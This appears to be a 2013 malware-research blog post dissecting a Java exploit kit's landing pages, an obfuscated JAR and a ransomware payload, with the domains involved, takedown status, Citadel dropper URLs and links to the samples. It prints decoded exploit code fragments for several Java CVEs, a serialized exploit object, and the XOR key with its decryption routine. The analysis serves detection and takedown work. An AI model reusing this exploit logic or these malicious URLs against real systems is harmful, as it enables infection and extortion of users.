bullseyemep.biz
wristwatchnmi.biz
skeweddd.biz
tlzoqmlsfirsthandgod.biz
voicefan.biz
standout-ncxblockerwfrb.biz
australiansxuu.biz
ieisqnformulasiv.biz
jacketkgd.biz
featuringxwx.biz
fumblingxibgsparhm.biz
blackbirdtr.biz
dp-pdrqcoralfzn.biz
wcud-pbductdpur.biz
rvyykgxghastlyoeq.biz
mgs-uvsbarnacleeink.biz
labelscqht.biz
rppmaeincludingfh.biz
esqniuoalarmtnhs.biz
ca-tsiamarillooil.biz
knivessdx.biz
ministryxsueyeballznqp.biz
reskd-nqlobjectssq.biz
sr-ewwrestlingxd.biz
Related Information:
@demon117 @malwaremustdie @set_abominae @kafeineRan into an Interesting kit today. i.imgur.com/XIDR001.png
— Mike (@HkMalwares) March 26, 2013
@demon117 @hkmalwares @malwaremustdie @set_abominaeSofosFO/Stamp EK@joelesler noticed increase move today.
— kafeine (@kafeine) March 26, 2013
@hkmalwares @demon117 @malwaremustdie @set_abominae @kafeine 240 domains registered -- investigation under progress. expect #TangoDown soon.
— sachin (@essachin) March 26, 2013
@malwaremustdie Similar SofosEK was observed at 37[.]139[.]51[.]141, yesterday. proprietary[.]clamqxor[.]biz/..../scribes.jar.
— Set Abominae (@Set_Abominae) March 26, 2013
#MalwareMustDie Infector #PoC SofosEK Landing Page atIP: 37.139.51.143 pastebin.com/raw.php?i=yY2Y…< for #TangoDown purpose
— Malware Crusaders (@MalwareMustDie) March 26, 2013

We had the active infectors is coming from the various urls as per below:

rootaliasx.biz/traff.html
dexthous.biz/traff.html
antestent.biz/hava.html
bastapils.biz/hava.html
bastapils.biz/traff.html
mzthtl.freewww.info/freeporn.html
ggooec.freewww.info/freeporn.html
ggooec.freewww.info/freeporn.html
zcmgiawwm.freewww.info/freeporn.html
asikdycf.wikaba.com/freeporn.html
hfncudbeu.wikaba.com/sextour.html
vjbgaz.freewww.info/freeporn.html
uekfnibe.wikaba.com/freeporn.html
bcmht.freewww.info/11111111.html
delphilol.biz/testo.html
xkshgc.wikaba.com/sextour.html
      :
      : (many more!)

[NEW] Quoted #Tango Dismantling Report Sat Apr 6 01:54:29 JST 2013:

==========================================================================
DOMAIN NAMES           A RECORD   NS SERVERS         SUSPENSION STATUS
--------------------------------------------------------------------------
rootaliasx.biz,,         IP DOWN  NORTH.INAPPLE.COM  SUSPENSION IN PROCESS
                                  SOUTH.INAPPLE.COM
                                  WEST.INAPPLE.COM
                                  EAST.INAPPLE.COM
dexthous.biz,,           IP DOWN  NORTH.INAPPLE.COM  SUSPENSION IN PROCESS
                                  SOUTH.INAPPLE.COM
                                  WEST.INAPPLE.COM
                                  EAST.INAPPLE.COM
antestent.biz,,          IP DOWN  NORTH.INAPPLE.COM  SUSPENSION IN PROCESS
                                  SOUTH.INAPPLE.COM
                                  WEST.INAPPLE.COM
                                  EAST.INAPPLE.COM
bastapils.biz,,          IP DOWN  NORTH.INAPPLE.COM  SUSPENSION IN PROCESS
                                  SOUTH.INAPPLE.COM
                                  WEST.INAPPLE.COM
                                  EAST.INAPPLE.COM
bastapils.biz,,          IP DOWN  NORTH.INAPPLE.COM  SUSPENSION IN PROCESS
                                  SOUTH.INAPPLE.COM
                                  WEST.INAPPLE.COM
                                  EAST.INAPPLE.COM
delphilol.biz,,          IP DOWN  NORTH.INAPPLE.COM  SUSPENSION IN PROCESS
                                  SOUTH.INAPPLE.COM
                                  WEST.INAPPLE.COM
                                  EAST.INAPPLE.COM
mzthtl.freewww.info,,    IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
ggooec.freewww.info,,    IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
zcmgiawwm.freewww.info,, IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
asikdycf.wikaba.com,,    IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
hfncudbeu.wikaba.com,,   IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
vjbgaz.freewww.info,,    IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
uekfnibe.wikaba.com,,    IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
bcmht.freewww.info,,     IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
xkshgc.wikaba.com,,      IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
     :                      :             :               : 

It is an Exploit Kit with the panel below:
(* In the end we were informed by @kafaine it's a RedDorv2 Exploit Kit)

The landing page infector contains the HTML like:
--2013-04-05 10:50:54--  h00p://rootaliasx.biz/traff.html
Resolving rootaliasx.biz... seconds 0.00, 46.4.179.111
Caching rootaliasx.biz => 46.4.179.111
Connecting to rootaliasx.biz|46.4.179.111|:80... seconds 0.00, connected.
GET /traff.html HTTP/1.0
Host: rootaliasx.biz
Connection: Keep-Alive
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Apr 2013 05:20:55 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.23
Cache-Control: no-store, no-cache
Expires: Fri, 05 Apr 2013 05:20:27 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 551
  :
200 OK
Length: 551 [text/html]
Saving to: `traff.html'
2013-04-05 10:50:56 (36.4 MB/s) - `traff.html' saved [551/551]
With the HTML code : As per coded it lead to the JAR file: 
--2013-04-04 14:40:45--  h00p://rootaliasx.biz/traff.jar
Resolving rootaliasx.biz... seconds 0.00, 46.4.179.111
Caching rootaliasx.biz => 46.4.179.111
Connecting to rootaliasx.biz|46.4.179.111|:80... seconds 0.00, connected.
  :
GET /traff.jar HTTP/1.0
Host: rootaliasx.biz
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 04 Apr 2013 09:10:45 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.23
Content-Disposition: attachment; filename="traff.jar"
Content-Length: 63706
Cache-Control: no-store, no-cache
Expires: Thu, 04 Apr 2013 09:10:17 GMT
Vary: Accept-Encoding,User-Agent
  :
200 OK
Length: 63706 (62K) [application/java-archive]
Saving to: `traff.jar'
2013-04-04 14:40:53 (8.32 KB/s) - `traff.jar' saved [63706/63706]
IP involved in the infection: ↑All IPs are in HELZNER Germany Network. Under below registrant: 
inetnum:        46.4.179.64 - 46.4.179.127
netname:        VPSSERVER
descr:          vpsserver
country:        DE
admin-c:        VK1952-RIPE
tech-c:         VK1952-RIPE
status:         ASSIGNED PA
mnt-by:         HOS-GUN
source:         RIPE Filtered"

person:         Viacheslav Krivosheev
address:        vps-server
address:        Poliykovskaiy 8a
address:        153011 IVANOVO
address:        RUSSIAN FEDERATION"
phone:          +79106677787
fax-no:         +74932502950
nic-hdl:        VK1952-RIPE
mnt-by:         HOS-GUN
source:         RIPE # Filtered
JAR File Details: (Thanks to VT for the format) 
SHA1: f8e433a2190017d9bd866374d6adfc124409e83e
MD5: 8a928628fa5d3e43db4ca1ae6d0213b6
File size: 62.2 KB ( 63705 bytes )
File name: traff.jar
File type: JAR
Some pcaps..& more evidence: Is the multiple class of Java archive executable, contains embedded object. The traff.jar classes is having components as follows: 
I: System environment sniffer
C: The main class to be called from landing page
D: Contains hidden W.class and XOR logic with its key
K: String translation + cascaded with char rotator logic obfuscatoin
S: Embedded object extractor logic, used same key as XOR
A: Has some exploit methods/codes with some obfuscation.
TRAFF: An embedded object trailed at the bottom (in HEX)

To make it simple it was rotating the chars with below logic in Java:
public static String rot13(String paramString)
  {
    String str = "";
    int i = 13;

    for (int j = 0; j < paramString.length(); j++)
    {
      char c = paramString.charAt(j);
      if ((c >= 'a') && (c <= 'm')) c = (char)(c + i);
      else if ((c >= 'A') && (c <= 'M')) c = (char)(c + i);
      else if ((c >= 'n') && (c <= 'z')) c = (char)(c - i);
      else if ((c >= 'N') && (c <= 'Z')) c = (char)(c - i);
      str = str + c;
    }
    return str;
  }
Which is resulting in rotation character below: 
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz 
NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm
And all of the strings in K.Class can be converted into below table: 
wnin.frphevgl.preg.Pregvsvpngr                              java.security.cert.Certificate               
wnin.frphevgl.PbqrFbhepr                                    java.security.CodeSource          
wnin.frphevgl.Crezvffvbaf                                   java.security.Permissions               
svyr:                                                       file:                                 
frg                                                         set                                     
fha.bet.zbmvyyn.wninfpevcg.vagreany.Pbagrkg                 sun.org.mozilla.javascript.internal.Context                             
pbz.fha.wzk.zornafreire.ZOrnaVafgnagvngbe                   com.sun.jmx.mbeanserver.MBeanInstantiator                           
H                                                           U                                   
cbejAXOIiDNOD                                               porwNKBVvQABQ                                               
1.7                                                         1.7                                     
wnin.vb.gzcqve                                              java.io.tmpdir  
svaqPynff                                                   findClass                                     
jimVfWd.rkr                                                 wvzIsJq.exe  
bf.anzr                                                     os.name                                     
wnink.znantrzrag.ZOrnaFreire                                javax.management.MBeanServer            
cbejAXOIiDNOD                                               porwNKBVvQABQ  
arjZOrnaFreire                                              newMBeanServer  
pbz.fha.wzk.zornafreire.Vagebfcrpgbe                        com.sun.jmx.mbeanserver.Introspector                    
Jvaqbjf                                                     Windows                                       
wnin.vb.gzcqve                                              java.io.tmpdir   
wnin.frphevgl.NyyCrezvffvba                                 java.security.AllPermission           
wnink.znantrzrag.ZOrnaFreireQryrtngr                        javax.management.MBeanServerDelegate                    
I                                                           V                                   
C                                                           P                                                                               
tnzr.J                                                      game.W                                  
ryrzragSebzPbzcyrk                                          elementFromComplex  
cbejAXOIiDNOD                                               porwNKBVvQABQ 
wnin.frphevgl.CebgrpgvbaQbznva                              java.security.ProtectionDomain                                                          
GGSPg.rkr                                                   TTFCt.exe                                     
fha.bet.zbmvyyn.wninfpevcg.vagreany.TrarengrqPynffYbnqre    sun.org.mozilla.javascript.internal.GeneratedClassLoader                                        
wnin.frphevgl.CrezvffvbaPbyyrpgvba                          java.security.PermissionCollection                  
wnin.irefvba                                                java.version   
pbz.fha.wzk.zornafreire.WzkZOrnaFreire                      com.sun.jmx.mbeanserver.JmxMBeanServer                      
trgZOrnaVafgnagvngbe                                        getMBeanInstantiator                                                
nqq                                                         add                                                                           
nprq0005757200135o4p6n6176612r6p616r672r4s626n6563743o90pr  aced0005757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000002757200095b4c67616d652e413bfe2c941188b6e5ff02000078700000000170737200306a6176612e7574696c2e636f6e63757272656e742e61746f6d69632e41746f6d69635265666572656e63654172726179a9d2dea1be65600c0200015b000561727261797400135b4c6a6176612f6c616e672f4f626a6563743b787071007e0003                                                                                
cbejAXOIiDNOD                                               porwNKBVvQABQ                                         
qrpynerqZrgubqf                                             declaredMethods                                           
wnin.frphevgl.Crezvffvba                                    java.security.Permission 
For the table picture is here: See the long var "aced...blah blah" string?  Is actually a Java class with the insides is CVE-2012-0507 code↓ 
0000   AC ED 00 05 75 72 00 13 5B 4C 6A 61 76 61 2E 6C    ....ur..[Ljava.l
0010   61 6E 67 2E 4F 62 6A 65 63 74 3B 90 CE 58 9F 10    ang.Object;..X..
0020   73 29 6C 02 00 00 78 70 00 00 00 02 75 72 00 09    s)l...xp....ur..
0030   5B 4C 67 61 6D 65 2E 41 3B FE 2C 94 11 88 B6 E5    [Lgame.A;.,.....
0040   FF 02 00 00 78 70 00 00 00 01 70 73 72 00 30 6A    ....xp....psr.0j
0050   61 76 61 2E 75 74 69 6C 2E 63 6F 6E 63 75 72 72    ava.util.concurr
0060   65 6E 74 2E 61 74 6F 6D 69 63 2E 41 74 6F 6D 69    ent.atomic.Atomi
0070   63 52 65 66 65 72 65 6E 63 65 41 72 72 61 79 A9    cReferenceArray.
0080   D2 DE A1 BE 65 60 0C 02 00 01 5B 00 05 61 72 72    ....e`....[..arr
0090   61 79 74 00 13 5B 4C 6A 61 76 61 2F 6C 61 6E 67    ayt..[Ljava/lang
00A0   2F 4F 62 6A 65 63 74 3B 78 70 71 00 7E 00 03       /Object;xpq.~..
OK, we got the table. What's next?   
Unlocked encoding logic
Put all K.class vars in the rest of the classes variables & that will make you understand the exploitation use completely:  In I class it detects OS Name and Java Versions: 
(9):  String str1 = System.getProperty(K.BvKs70); /// System.getProperty(os.name); 
(24): String str8 = System.getProperty(K.sATQ);   /// System.getProperty(java.version);
(32): String str10 = getParameter(K.JgUQEqm);     /// getParameter(U); 
(40): String str14 = getParameter(K.HS0g);        /// getParameter(V);
And also IMPORTANT condition of infection (main windows + Java >= 1.7)
(58): (str1.indexOf(K.jp1jj) >= 0)   // if (str1.indexOf(Windows) >= 0)
(83): if (str8.startsWith(K.adxAi3j))   // if (str8.startsWith(1.7))
In A class : 
(27):  URL localURL = new URL(K.F5vzTsGa + "//");   → URL localURL = new URL("file:" + "//");
(43):  Class localClass1 = Class.forName(K.zDCn9Y);  → Class localClass1 = Class.forName("java.security.cert.Certificate");
(68):  Class localClass2 = Class.forName(K.dy3rkh);  → Class localClass2 = Class.forName("java.security.Permissions"); 
(86):  Class localClass3 = Class.forName(K.hkhQ5O);  → Class localClass3 = Class.forName("java.security.Permissions");
(98):  Method localMethod = localClass2.getMethod(K.Url1a, new Class[] { localClass3 }); →  K.Url1a == "add"
(100): localMethod.invoke(localObject2, new Object[] { Class.forName(K.ZklLSir).newInstance() }); → K.ZklLSir == "java.security.AllPermission"
(113): Class localClass4 = Class.forName(K.tmc3I);  → "java.security.ProtectionDomain"
(117): Class localClass5 = Class.forName(K.SNku);   → "java.security.Permissions"
(133): Class localClass6 = Class.forName(K.uKIX_p);  → "java.security.PermissionCollection"
(195): Class localClass7 = paramA.defineClass(K.Jb928E, D.decoded, 0, i104, (ProtectionDomain)localObject4); // "game.W"
(211): String str49 = System.getProperty(K.p6BEDfqv);   → "java.io.tmpdir"
(218): String str51 = "\\" + K.JuUKXjj;   → "TTFCt.exe"
(263): localConstructor3.newInstance(new Object[] { paramString1, paramString2, paramString3, "0", str49 + str51, S.class.getClassLoader().getResourceAsStream(paramString3), K.PH8cd4 });
→　"porwNKBVvQABQ"
In C Class: 
(73): ObjectInputStream localObjectInputStream = new ObjectInputStream(new ByteArrayInputStream(X(K.TvUD3yH4)));
↑This will getting the binary stream CVE-2012-0507 to be loaded. because the : 
K.TvUD3yH4 = "aced000575...(snipped)...f626a6563743b787" 
And.. 
(96): localObject[1].getClass().getMethod(K.I4VwpS8, new Class[] { Integer.TYPE, Object.class }).invoke(localObject[1], new Object[] { Integer.valueOf(0), getClass().getClassLoader() });
→ K.I4VwpS8 == "set"
This is the abuse of the getMethod of - java.lang.reflect.Method invoke() method CVE-2012-4820  In the K Class, let's see what bad actors tried to hide: javax.management.MBeanServer was imported as per encoded: 
(128): public static String uuIj = new String(rot13("wnink.znantrzrag.ZOrnaFreire"));
(301): public static String ZyZhnh5a = new String(rot13("pbz.fha.wzk.zornafreire.WzkZOrnaFreire"));
com.sun.jmx.mbeanserver.Introspector was imported as per encoded: 
(62):  public static String Qj7BnL = new String(rot13("pbz.fha.wzk.zornafreire.ZOrnaVafgnagvngbe"));
(148): public static String dradg2 = new String(rot13("pbz.fha.wzk.zornafreire.Vagebfcrpgbe"));
and javax.management.MBeanServerDelegate: 
(182): public static String i_fJGSy = new String(rot13("wnink.znantrzrag.ZOrnaFreireQryrtngr"));
In the S class was written: 
(14):  Class localClass = Class.forName(K.dradg2);  // Class localClass = Class.forName(com.sun.jmx.mbeanserver.Introspector); 
(17):  Method localMethod1 = localClass.getMethod(K.vpAhSF, new Class[] { Object.class, String.class });
(20):  Method[] arrayOfMethod1 = (Method[])(Method[])localMethod1.invoke(null, new Object[] { paramObject, K.uATab_ });
(103): Class localClass1 = Class.forName(K.ZyZhnh5a);
(118): Method localMethod1 = localClass1.getMethod(K.CqAw, new Class[] { String.class, Class.forName(K.uuIj), Class.forName(K.i_fJGSy), Boolean.TYPE });
(139): Class localClass2 = Class.forName(K.Qj7BnL);
(149): Method localMethod2 = localClass1.getMethod(K.n7tOG, new Class[0]);
(173): Method localMethod3 = localClass2.getMethod(K.lKCeXn, new Class[] { String.class, ClassLoader.class });
(188): Class localClass1 = fItgag(K.Mg7ws1);
(226): Class localClass2 = fItgag(K.YoILBY);
(262): String str27 = System.getProperty(K.aPd5);
(269): String str30 = "\\" + K.H95l4;
(311): localConstructor.newInstance(new Object[] { paramString1, paramString2, paramString3, "1", str27 + str30, S.class.getClassLoader().getResourceAsStream(paramString3), K.F8pYg2tfr });
which is actually means: 
(14):  Class localClass = Class.forName(com.sun.jmx.mbeanserver.Introspector);
(17):  Method localMethod1 = localClass.getMethod(elementFromComplex, new Class[] { Object.class, String.class });
(20):  Method[] arrayOfMethod1 = (Method[])(Method[])localMethod1.invoke(null, new Object[] { paramObject, declaredMethods });
(103): Class localClass1 = Class.forName(com.sun.jmx.mbeanserver.JmxMBeanServer);
(118): Method localMethod1 = localClass1.getMethod(K.CqAw, new Class[] { String.class, Class.forName(K.uuIj), Class.forName(javax.management.MBeanServerDelegate), Boolean.TYPE });
(139): Class localClass2 = Class.forName(com.sun.jmx.mbeanserver.Introspector);
(149): Method localMethod2 = localClass1.getMethod(getMBeanInstantiator, new Class[0]);
(173): Method localMethod3 = localClass2.getMethod(findClass, new Class[] { String.class, ClassLoader.class });
(188): Class localClass1 = fItgag(sun.org.mozilla.javascript.internal.Context);
(226): Class localClass2 = fItgag(sun.org.mozilla.javascript.internal.GeneratedClassLoade);
(262): String str27 = System.getProperty(java.io.tmpdir);
(269): String str30 = "\\" + "wvzIsJq.exe";
(311): localConstructor.newInstance(new Object[] { paramString1, paramString2, paramString3, "1", str27 + str30, S.class.getClassLoader().getResourceAsStream(paramString3), porwNKBVvQABQ });
OK, we have all codes decoded, we can read all codes now!  Good, first let's see if we can recognize the exploitation used..  
Exploitation

Shortly. These are the list of exploitation(CVE/CWE) method I can spot:
CVE-2012-4820: java.lang.reflect.Method invoke() method 
CWE-578: EJB Bad Practices use of Class Loader
CVE-2012-0507 Java AtomicReferenceArray Type Violation
CVE-2013-0431 Getting access to restricted classes (via com.sun.jmx.mbeanserver.MBeanInstantiator) 
Payload

A.class with payload: "TTFCt.exe"
S.class with the payload: "wvzIsJq.exe"

First route to payload...

Payload was coded to be defined by the below code as a class. Is it really a class?

Class localClass7 = paramA.defineClass("game.W", 
     D.decoded, 0, i104, 
    (ProtectionDomain)localObject4);

:-) ↓We can see the decoded XOR key used...

public static byte[] decoded = XorDecrypt(encoded, "porwNKBVvQABQ");

public static byte[] encoded = { -70, -111, -..
.., 35, 89, 65, 20, 86, 112, 56, 120, 119, 22, ..
..5, 89, 81, 58, 101, 114, 84, 78, 1, 69, 86, 6..
... 29, 47, 61, 35, 121, 31, 62, 110, 11, 63, 0,..
...3, 48, 56, 30, 8, 73, 94, 2, 33, 35, 32, 23, ..
... 0, 48, 110, 46, 48, 30, 8, 93, 36, 58, 57, 4..
..., 16, 97, 24, 54, 36, 31, 63, 38, 121, 120, 3..
...4, 80, 65, 90, 59, 17, 25, 19, 88, 39, 36, 10..
... 112, -24, 114, -2, 66, 75, -56, 86, -3, 80, ..

public static byte[] XorDecrypt(byte[] paramArrayOfByte, String paramString)
{ int i = 0; for (int j = 0; i < paramArrayOfByte.length; j = (j + 1) % paramString.length())
  { int tmp12_11 = i; paramArrayOfByte[tmp12_11] = (byte)(paramArrayOfByte[tmp12_11] 
   ^ paramString.charAt(j));

↓localObject4 = localConstructor1.newInstance(new Object[] { localObject3, localObject2 });
↓localObject3 = localConstructor2.newInstance(new Object[] { localURL, localObject1 });
↓localObject2 = localMethod1.invoke(null, new Object[] { "", null, null, Boolean.valueOf(true) });
localObject1 = Array.newInstance(localClass1, 0)

Second route to payload, a bypass :-)

-rwxr--r--  1 MMD  toor  31232 Apr  3 22:44 "traff"*

0000   3D 35 F2 77 4F 4B 42 56 72 51 51 42 AE 8F 6F 72    =5.wOKBVrQQB..or
0010   37 4F 4B 42 56 76 51 41 02 51 70 6F 72 77 4E 4B    7OKBVvQA.QporwNK
0020   42 56 76 51 41 42 51 70 6F 72 77 4E 4B 42 56 76    BVvQABQporwNKBVv
0030   51 41 42 51 70 6F 72 77 4E 4B 42 56 F6 51 41 42    QABQporwNKBV.QAB
0040   5F 6F D5 7C 77 FA 42 8F 77 CE 50 0D 8F 70 24 07    _o.|w.B.w.P..p$.
0050   1B 04 6E 3B 30 39 11 23 20 2F 71 13 0E 1C 19 21    ..n;09.# /q....!
0060   3F 62 34 13 71 33 37 3F 50 06 1C 57 0A 04 11 76    ?b4.q37?P..W...v
0070   1B 3E 25 27 7F 7D 65 56 77 4E 4B 42 56 76 51 41    .>%'.}eVwNKBVvQA
0080   12 14 70 6F 3E 76 4B 4B 45 62 2A 00 41 42 51 70    ..po>vKKEb*.ABQp
0090   6F 72 77 4E AB 42 58 77 5A 40 43 16 70 6D 72 77    orwN.BXwZ@C.pmrw
 :                        :                                     :
7820   05 46 08 71 27 61 F1 5F F4 47 C0 7B D5 66 E9 61    .F.q’a._.G.{.f.a
7830   E4 72 E1 40 D9 42 C8 7E 8E 72 9C 46 81 71 98 61    .r.@.B.~.r.F.q.a
7840   99 5F 64 46 7D 7A 1D 67 08 60 C6 73 F7 41 D9 43    ._dF}z.g.’.s.A.C
7850   92 7F A6 73 56 76 51 41 42 51 70 6F 72 77 4E 4B    ...sVvQABQporwNK
7860   42 56 76 51 41 42 51 70 6F 72 77 4E 4B 42 56 76    BVvQABQporwNKBVv
7870   51 41 42 51 70 6F 72 77 4E 4B 42 56 76 51 41 42    QABQporwNKBVvQAB
7880   51 70 6F 72 77 4E 4B 42 56 76 51 41 42 51 70 6F    QporwNKBVvQABQpo
 :                       :                                      : 
7990   42 51 70 6F 72 77 4E 4B 42 56 76 51 41 42 51 70    BQporwNKBVvQABQp
79A0   6F 72 77 4E 4B 42 56 76 51 41 42 51 70 6F 72 77    orwNKBVvQABQporw
79B0   4E 4B 42 56 76 51 41 42 51 70 6F 72 77 4E 4B 42    NKBVvQABQporwNKB
79C0   56 76 51 41 42 51 70 6F 72 77 4E 4B 42 56 76 51    VvQABQporwNKBVvQ
79D0   41 42 51 70 6F 72 77 4E 4B 42 56 76 51 41 42 51    ABQporwNKBVvQABQ
79E0   70 6F 72 77 4E 4B 42 56 76 51 41 42 51 70 6F 72    porwNKBVvQABQpor
79F0   77 4E 4B 42 56 76 51 41 42 51 70 6F 72 77 4E 4B    wNKBVvQABQporwNK

localClass3 = (Class)localMethod3.invoke(localObject2, new Object[] { null, D.decoded });

(311): localConstructor.newInstance(new Object[] { paramString1, paramString2, paramString3, "1", str27 + str30, S.class.getClassLoader().getResourceAsStream(paramString3), porwNKBVvQABQ });

str27 = System.getProperty(java.io.tmpdir);
str30 = "\\" + "wvzIsJq.exe";

$ myxorwraper.py -l 13 -k porwNKBVvQABQ ./traff
./20130405100541.out
$ ls -alF 20130405100541.out
"-rwxr--r--  1 xxx xxx  31232 Apr  5 19:06 20130405100541.out*"

Exif++:
MIMEType                  : application/octet-stream
Subsystem                 : Windows GUI
MachineType               : Intel 386 or later, and compatibles
TimeStamp                 : 2013:04:03 14:52:07+01:00
CompileTime               : 2013-04-03 13:52:07
FileType                  : Win32 EXE
PEType                    : PE32
CodeSize                  : 512
LinkerVersion             : 1.71
InitializedDataSize       : 29696
SubsystemVersion          : 4.0
ImageVersion              : 0.0
OSVersion                 : 1.0
UninitializedDataSize     : 0

Sections:
   .code 0x1000 0x1fa 512
   .data 0x2000 0x6d3c 28160
   .edata 0x9000 0x50 512
   .idata 0xa000 0x1d4 512
   .reloc 0xb000 0x54 512

Entry Point at 0x400
Virtual Address is 0x401000
  :              
0000   4D 5A 80 00 01 00 00 00 04 00 10 00 FF FF 00 00    MZ..............
0010   40 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00    @.......@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0A 24 00 00 00 00 00 00 00 00    mode...$........
0080   50 45 00 00 4C 01 05 00 07 34 5C 51 00 00 00 00    PE..L....4.Q....

SHA256: bab60825b4e25ecbe42981514b3854451eeb542b2bf7efdf65c1dac1d1b47b2d
SHA1: 8c9f66d79f2b798cc655612af41d51ed53c9f222
MD5: 2a933a291f92e2a257c5cb0875b227a2
File size: 30.5 KB ( 31232 bytes )
File name: 2a933a291f92e2a257c5cb0875b227a2.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 5 / 46
Analysis date: 2013-04-04 17:06:37 UTC ( 17 hours, 6 minutes ago )
Malware names;
Panda                    : Trj/Dtcontx.C
Symantec                 : WS.Reputation.1
CAT-QuickHeal            : (Suspicious) - DNAScan
Kaspersky                : Trojan-Ransom.Win32.Foreign.bdjg
Microsoft                : Trojan:Win32/Urausy.D

@malwaremustdie I found this LockScreen in a lot of .ru domains with IPs 134.0.116.18, 62.122.213.10, 77.246.149.33 twitter.com/nyxbone/status…

— Mosh (@nyxbone) April 5, 2013

If you got infected by this ransomware you'll find these files in %AppData% and some changes in registry pointing autostart of these "AltShell". These are the self-copied of the payload, and to be executed by shell environment.

Kudoz! MalwareMustDie Team!

#MalwareMustDie MOAR Ransomware at 46.4.179.118 (thx:@nyxbone) pastebin.com/raw.php?i=SpaJ… VT=2/46 virustotal.com/en/file/cc7d71…twitter.com/MalwareMustDie…

— Malware Crusaders (@MalwareMustDie) April 7, 2013

@malwaremustdiewt4n6.com/CuckooResults/…

— Robin Jackson (@rjacksix) April 5, 2013

Quick note to "wack" the bins...

Oh MAI.. blocked by pastebin "AGAIN"... (why me.. why now..why!!!) #crusadeistough

— Malware Crusaders (@MalwareMustDie) April 4, 2013

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzNOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm

— WT4N6 (@Cephurs) April 4, 2013

@malwaremustdie good work friends . expect a #tangodown its gonna be huge

— sachin (@essachin) April 4, 2013

@malwaremustdie @cephurs Looking at the encoded and decoded java, I assume there was a "letter-shifting" cipher involved? (e.g: A->C, B->D)

— Donovan Glover (@GloverDonovan) April 5, 2013

@malwaremustdietwitter.com/kafeine/status…Seems to share a huge amount of things with RedDot.Not knowing we @ekwatcher @node5use Reddotv2

— kafeine (@kafeine) April 5, 2013

Samples

We shared the samples for the research & raising detection ratio:
Download is here-->>[HERE]

#MalwareMustDie!

(For the reference analysis of the Citadel that can be used as reference to this analysis, I recommend you to read Malware Analysis: Citadel bu AhnLab-->>[HERE])

By some reference we figured the latest citadel config dropper url contains regex:

\/file.php\|file\=

h00p://www.keihingroup.co.jp/libraries/joomla/access/file.php|file=4mar.exe
h00p://metabor.com/analytics/file.php|file=tok.exe
h00p://91.217.254.63/ara1/file.php|file=citadelbuild.exe

h00p://k-k131.co.jp/administrator/templates/system/html/file.php|file=conf.bin
h00p://apenhaimcanadaupdate4.com/CiTys897yusa072assSA/file.php|file=config.dll
h00p://womancasdorinosvictor.com/CiTys897yusa072assSA/file.php|file=config.bin
h00p://uredasqopjerl.net/tables/file.php|file=zcfg.bin

A regex search in URLquery will resulted into many infected sites as per below picture, you can click it to see the result.

Since the shutdown effort was prioritized in this case, we would like to share detail analysis we had in the infected file downloaded from the first url only, as per I uploaded in the Virus Total in detail as per below, in this url -->>[HERE]

Virus Total check result of the downloaded 4mar.exe showed:

SHA256: 97aafc6e53eaedc1ecf07c996b181fbfeec4bca88007114a961d148e6abb414f
SHA1: 58283aeaa4737ccd485181ca31c067f37885905e
MD5: 699e84682acdf3304fc79014e30eb11f
File size: 241.5 KB ( 247296 bytes )
File name: 4mar.exe
File type: Win32 EXE
Tags: peexe armadillo
Detection ratio: 28 / 46
Analysis date: 2013-04-08 04:49:49 UTC ( 2 hours, 16 minutes ago )

File ./4mar.exe with MD5 699e84682acdf3304fc79014e30eb11f
---------------------------------------------------------
nProtect                 : Trojan.Generic.KDV.906991
McAfee                   : Artemis!699E84682ACD
Malwarebytes             : Trojan.Zbot.HEEP
Symantec                 : WS.Reputation.1
Norman                   : ZBot.GSSC
ESET-NOD32               : a variant of Win32/Injector.AEDR
TrendMicro-HouseCall     : TROJ_SPNR.0BCO13
Avast                    : Win32:Crypt-OZC [Trj]
Kaspersky                : Trojan-Spy.Win32.Zbot.jwcj
BitDefender              : Trojan.Generic.KDV.906991
Sophos                   : Mal/Generic-S
Comodo                   : UnclassifiedMalware
F-Secure                 : Trojan.Generic.KDV.906991
VIPRE                    : Trojan.Win32.Generic!BT
AntiVir                  : TR/PSW.Zbot.1039
TrendMicro               : TROJ_SPNR.0BCO13
McAfee-GW-Edition        : Artemis!699E84682ACD
Emsisoft                 : Trojan.Win32.Injector.AEDR.AMN (A)
Microsoft                : PWS:Win32/Zbot
SUPERAntiSpyware         : Trojan.Agent/Gen-Festo
GData                    : Trojan.Generic.KDV.906991
Commtouch                : W32/Trojan.LIMH-2300
AhnLab-V3                : Spyware/Win32.Zbot
VBA32                    : TrojanSpy.Zbot.jwcj
Ikarus                   : Trojan-Spy.Win32.Zbot
Fortinet                 : W32/Injector.AEDR
AVG                      : Dropper.Generic7.COPV
Panda                    : Trj/CI.A

Quick review, snapshots & sample of the infection

The 4mar.exe is a well known malware as Citadel bot agent trojan. If the malware run in your PC it will decrypt itself then self copied & install the configuration file as per shown below:

And the inside of config file dropped in above picture looks like this:

